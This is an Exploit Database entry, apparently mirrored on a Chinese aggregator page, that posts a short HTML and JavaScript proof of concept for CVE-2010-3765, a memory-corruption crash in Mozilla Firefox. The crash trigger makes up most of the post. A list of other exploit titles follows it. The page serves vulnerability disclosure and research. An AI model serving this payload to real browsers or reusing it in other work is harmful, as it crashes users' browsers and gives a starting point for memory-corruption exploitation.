Mozilla Firefox – Simplified Memory Corruption (PoC)

Exploit Database
86 阅读

作者： extraexploit

日期： 2010-10-28
类别：
- dos
平台：
- multiple
来源：https://www.exploit-db.com/exploits/15342/

Hi there,

For those who still do not know .. The proof of concept (that I have
extracted) for CVE-2010-3765 is the following:

<html><body>
<script>

function G(str){
var cobj=document.createElement(str);
document.body.appendChild(cobj);
cobj.scrollWidth;
}

function crashme() {
document.write("fooFOO");
G("a");
document.write("<a lang></a>a");
G("base");
document.write("barBAR");
G("audio");
}
</script>
<script>crashme();</script>
</body>
</html>

For more details:
http://extraexploit.blogspot.com/2010/10/cve-2010-3765-proof-of-concept.html
-- 
http://extraexploit.blogspot.com

last Exploits
Mozilla Firefox – Simplified Memory Corruption (PoC)的更多信息

TeamSpeak 3.0.0-beta25 – Multiple Vulnerabilities：
PicaJet FX 2.6.5 – Denial of Service (PoC)：
Adobe Flash Player 22.0.0.192 – DefineSprite Memory Corruption：
Sun Solaris 10 – ‘in.ftpd’ Long Command Handling Security：
Cisco Smart Install – Crash (PoC)：
Adobe Flash – Use-After-Free When Returning Rectangle：
Google Chrome 4.1 – Out-of-Bounds Array Indexing：
Adobe Flash AS2 – textfield.filters Use-After-Free (1)：